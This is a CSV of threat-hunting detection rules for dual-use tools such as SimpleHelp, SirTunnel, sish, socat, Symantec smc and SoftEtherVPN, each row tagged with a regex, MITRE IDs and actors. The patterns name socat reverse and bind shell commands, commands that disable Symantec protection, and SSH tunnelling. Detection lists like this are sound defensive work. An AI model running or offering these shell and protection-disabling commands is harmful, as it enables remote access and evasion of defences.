"*SimpleHelp Technician-windows32-online.exe*",".{0,1000}SimpleHelp\sTechnician\-windows32\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-windows64-offline.exe*",".{0,1000}SimpleHelp\sTechnician\-windows64\-offline\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*simplehelp technician-windows64-online.exe*",".{0,1000}simplehelp\stechnician\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-windows64-online.exe*",".{0,1000}SimpleHelp\sTechnician\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*simplehelp technicianwinlauncher.exe*",".{0,1000}simplehelp\stechnicianwinlauncher\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp.exe*",".{0,1000}SimpleHelp\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*simplehelp.technician.127_0_0_1*",".{0,1000}simplehelp\.technician\.127_0_0_1.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp-allplatforms.zip*",".{0,1000}SimpleHelp\-allplatforms\.zip.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*simplehelpcustomer.exe*",".{0,1000}simplehelpcustomer\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp-install-64.exe*",".{0,1000}SimpleHelp\-install\-64\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* -m SimpleHTTPServer *",".{0,1000}\s\-m\sSimpleHTTPServer\s.{0,1000}","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*import SimpleHTTPServer*",".{0,1000}import\sSimpleHTTPServer.{0,1000}","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*python -m SimpleHTTPServer*",".{0,1000}python\s\-m\sSimpleHTTPServer.{0,1000}","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*SimpleHTTPServer.SimpleHTTPRequestHandler*",".{0,1000}SimpleHTTPServer\.SimpleHTTPRequestHandler.{0,1000}","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"* $domain sirtunnel $domain $serverPort*",".{0,1000}\s\$domain\ssirtunnel\s\$domain\s\$serverPort.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","0","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z"
"* sirtunnel.py*",".{0,1000}\ssirtunnel\.py.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","0","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z"
"*/config/apps/http/servers/sirtunnel/routes*",".{0,1000}\/config\/apps\/http\/servers\/sirtunnel\/routes.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z"
"*/SirTunnel.git*",".{0,1000}\/SirTunnel\.git.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z"
"*/sirtunnel.py*",".{0,1000}\/sirtunnel\.py.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z"
"*\sirtunnel.py*",".{0,1000}\\sirtunnel\.py.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","0","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z"
"*anderspitman/SirTunnel*",".{0,1000}anderspitman\/SirTunnel.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z"
"*d5687d84d518119cbdd84183bfe8cb29009d054794b3aed5bda7ad117a7e4d5e*",".{0,1000}d5687d84d518119cbdd84183bfe8cb29009d054794b3aed5bda7ad117a7e4d5e.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","0","#filehash","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z"
"*daps94/SirTunnel*",".{0,1000}daps94\/SirTunnel.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z"
"*http://127.0.0.1:2019/id/*",".{0,1000}http\:\/\/127\.0\.0\.1\:2019\/id\/.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z"
"*matiboy/SirTunnel*",".{0,1000}matiboy\/SirTunnel.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z"
"* sish -c date*",".{0,1000}\ssish\s\-c\sdate.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*/_sish/console*",".{0,1000}\/_sish\/console.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*/sish.git*",".{0,1000}\/sish\.git.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*/sish.log*",".{0,1000}\/sish\.log.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*/sish/cmd/*",".{0,1000}\/sish\/cmd\/.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*\sish.log*",".{0,1000}\\sish\.log.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*eb0d8e4273608c13b5957ac047f911442b3d55527e20097cd038e120f01df5ae*",".{0,1000}eb0d8e4273608c13b5957ac047f911442b3d55527e20097cd038e120f01df5ae.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*http://*.ssi.sh*",".{0,1000}http\:\/\/.{0,1000}\.ssi\.sh.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*https://*.ssi.sh*",".{0,1000}https\:\/\/.{0,1000}\.ssi\.sh.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*sish -x*",".{0,1000}sish\s\-x.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*ssh -L * tuns.sh*",".{0,1000}ssh\s\-L\s.{0,1000}\stuns\.sh.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*ssh -R * tuns.sh*",".{0,1000}ssh\s\-R\s.{0,1000}\stuns\.sh.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*testing.ssi.sh*",".{0,1000}testing\.ssi\.sh.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z"
"*https://www.skymem.info/srch?q=*",".{0,1000}https\:\/\/www\.skymem\.info\/srch\?q\=.{0,1000}","greyware_tool_keyword","skymen.info","used by attackers to find informations about a company users","T1593 - T1596 - T1213","TA0009","N/A","N/A","Reconnaissance","https://www.skymem.info","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://slack.com/api/channels.create*",".{0,1000}https\:\/\/slack\.com\/api\/channels\.create.{0,1000}","greyware_tool_keyword","slack","API usage of slack - creating channel - abused by multiple C2","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/mthcht/Purpleteam/blob/main/Detection/Threat%20Hunting/generic/C2_abusing_API_services.md","0","1","N/A","/!\ very high risk of FP - hunting only","1","2","146","15","2024-08-30T08:50:53Z","2022-12-05T12:40:02Z"
"*smc -disable -mem*",".{0,1000}smc\s\-disable\s\-mem.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z"
"*smc -disable -ntp*",".{0,1000}smc\s\-disable\s\-ntp.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z"
"*smc -disable -wss*",".{0,1000}smc\s\-disable\s\-wss.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z"
"*smc -enable -gem*",".{0,1000}smc\s\-enable\s\-gem.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z"
"*smc.exe -disable -mem*",".{0,1000}smc\.exe\s\-disable\s\-mem.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z"
"*smc.exe -disable -ntp*",".{0,1000}smc\.exe\s\-disable\s\-ntp.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z"
"*smc.exe -disable -wss*",".{0,1000}smc\.exe\s\-disable\s\-wss.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z"
"*smc.exe -enable -gem*",".{0,1000}smc\.exe\s\-enable\s\-gem.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z"
"*install snmpcheck*",".{0,1000}install\ssnmpcheck.{0,1000}","greyware_tool_keyword","snmpcheck","automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","http://www.nothink.org/codes/snmpcheck/index.php","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*snmp-check * -c public*",".{0,1000}snmp\-check\s.{0,1000}\s\-c\spublic.{0,1000}","greyware_tool_keyword","snmpcheck","automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","http://www.nothink.org/codes/snmpcheck/index.php","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*snmpwalk  -v1 -cpublic *",".{0,1000}snmpwalk\s\s\-v1\s\-cpublic\s.{0,1000}","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A"
"*snmpwalk * public *1.3.6.1.*",".{0,1000}snmpwalk\s.{0,1000}\spublic\s.{0,1000}1\.3\.6\.1\..{0,1000}","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A"
"*snmpwalk -c public -v1 *",".{0,1000}snmpwalk\s\-c\spublic\s\-v1\s.{0,1000}","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A"
"*socat exec:*",".{0,1000}socat\sexec\:.{0,1000}","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","Scattered Spider*","C2","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*socat FILE:*tty*raw*echo=0 TCP*:*",".{0,1000}socat\sFILE\:.{0,1000}tty.{0,1000}raw.{0,1000}echo\=0\sTCP.{0,1000}\:.{0,1000}","greyware_tool_keyword","socat","socat bind shell","T1071 - T1573","TA0002 - TA0011","N/A","Scattered Spider*","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*socat file:*tty*raw*echo=0 tcp-listen:*",".{0,1000}socat\sfile\:.{0,1000}tty.{0,1000}raw.{0,1000}echo\=0\stcp\-listen\:.{0,1000}","greyware_tool_keyword","socat","socat reverse shell","T1071 - T1573","TA0002 - TA0011","N/A","Scattered Spider*","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*socat http://0x0*",".{0,1000}socat\shttp\:\/\/0x0.{0,1000}","greyware_tool_keyword","socat","contains an IP address as part of a URL or network destination formatted in an unconventional but technically valid way (hexa - octal - binary)","T1027 - T1059.004 - T1132.002","TA0011 - TA0005 - TA0002","","","Defense Evasion","https://x.com/CraigHRowland/status/1821176342999921040","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*socat -lp * http://0x0*",".{0,1000}socat\s\-lp\s.{0,1000}\shttp\:\/\/0x0.{0,1000}","greyware_tool_keyword","socat","contains an IP address as part of a URL or network destination formatted in an unconventional but technically valid way (hexa - octal - binary)","T1027 - T1059.004 - T1132.002","TA0011 - TA0005 - TA0002","","","Defense Evasion","https://x.com/CraigHRowland/status/1821176342999921040","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*socat -O /tmp/*",".{0,1000}socat\s\-O\s\/tmp\/.{0,1000}","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","Scattered Spider*","C2","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*socat TCP4-LISTEN:* fork TCP4:*:*",".{0,1000}socat\sTCP4\-LISTEN\:.{0,1000}\sfork\sTCP4\:.{0,1000}\:.{0,1000}","greyware_tool_keyword","socat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0011","N/A","Scattered Spider*","C2","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*socat tcp-connect*",".{0,1000}socat\stcp\-connect.{0,1000}","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","Scattered Spider*","C2","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*socat tcp-connect:*:* exec:*bash -li**pty*stderr*setsid*sigint*sane*",".{0,1000}socat\stcp\-connect\:.{0,1000}\:.{0,1000}\sexec\:.{0,1000}bash\s\-li.{0,1000}.{0,1000}pty.{0,1000}stderr.{0,1000}setsid.{0,1000}sigint.{0,1000}sane.{0,1000}","greyware_tool_keyword","socat","socat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","Scattered Spider*","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","N/A","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*socat tcp-connect:*:* exec:/bin/sh*",".{0,1000}socat\stcp\-connect\:.{0,1000}\:.{0,1000}\sexec\:\/bin\/sh.{0,1000}","greyware_tool_keyword","socat","socat reverse shell","T1071 - T1573","TA0002 - TA0011","N/A","Scattered Spider*","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*socat TCP-LISTEN:**reuseaddr*fork EXEC:/bin/sh*",".{0,1000}socat\sTCP\-LISTEN\:.{0,1000}.{0,1000}reuseaddr.{0,1000}fork\sEXEC\:\/bin\/sh.{0,1000}","greyware_tool_keyword","socat","socat bind shell","T1071 - T1573","TA0002 - TA0011","N/A","Scattered Spider*","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*igahhbkcppaollcjeaaoapkijbnphfhb*",".{0,1000}igahhbkcppaollcjeaaoapkijbnphfhb.{0,1000}","greyware_tool_keyword","Social VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* install softether5*",".{0,1000}\sinstall\ssoftether5.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"* SoftEtherVPN-*.tar.xz*",".{0,1000}\sSoftEtherVPN\-.{0,1000}\.tar\.xz.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*/libexec/softether/vpnserver/vpnserver*",".{0,1000}\/libexec\/softether\/vpnserver\/vpnserver.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*/SoftEtherVPN-*.tar.xz*",".{0,1000}\/SoftEtherVPN\-.{0,1000}\.tar\.xz.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
